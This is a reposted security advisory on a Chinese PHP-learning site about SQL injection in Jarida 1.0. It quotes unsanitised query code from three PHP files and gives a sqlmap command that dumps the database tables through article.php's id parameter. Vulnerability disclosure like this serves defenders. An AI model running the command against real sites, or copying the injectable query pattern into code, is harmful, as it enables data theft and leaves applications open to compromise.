来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 标题: Jarida 1.0 SQL Injection作者: Ptrace Security (Gianni Gnesa [gnix]) www.2cto.com下载地址: http://sourceforge.net/projects/jarida/影响版本: 1.0测试平台: CentOS 5.6[01] ./articl......
|
标题: Jarida 1.0 SQL Injection 作者: Ptrace Security (Gianni Gnesa [gnix]) www.2cto.com 下载地址: http://sourceforge.net/projects/jarida/ 影响版本: 1.0 测试平台: CentOS 5.6
[01] ./article.php:28: $query = "SELECT article_id FROM tblArticle WHERE article_id = " . $_GET['id']; => ./sqlmap.py -u http://www.2cto.com /jarida_1.0/article.php?id=1 --dump --tables
[02] ./comment.php
36 $name = $_POST['name']; 37 $web = $_POST['web']; 38 $title = $_POST['title']; 39 $body = $_POST['body']; 40 $ip = $_SERVER['REMOTE_ADDR']; 41 $article_id = $_POST['id']; 42 $date = time(); 43 ... 56 57 switch($_POST['type']) 58 { 59 case 'article': 60 $redirect_url = "./article.php?id=" . $_POST['id']; 61 $query = "INSERT INTO tblArticleComment (comment_article_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip) 62 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')"; 63 break; 64 65 case 'photo': 66 $redirect_url = "./photo.php?id=" . $_POST['id']; 67 $query = "INSERT INTO tblPhotoComment (comment_photo_id, comment_title, comment_date, comment_body, comment_name, comment_web, comment_ip) 68 VALUES('$article_id', '$title', '$date', '$body', '$name', '$web', '$ip')"; 69 break; 70 }
[03] ./photo.php
39 $query = "SELECT photo_id FROM tblPhoto 40 WHERE photo_id = " . $_GET['id']; |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
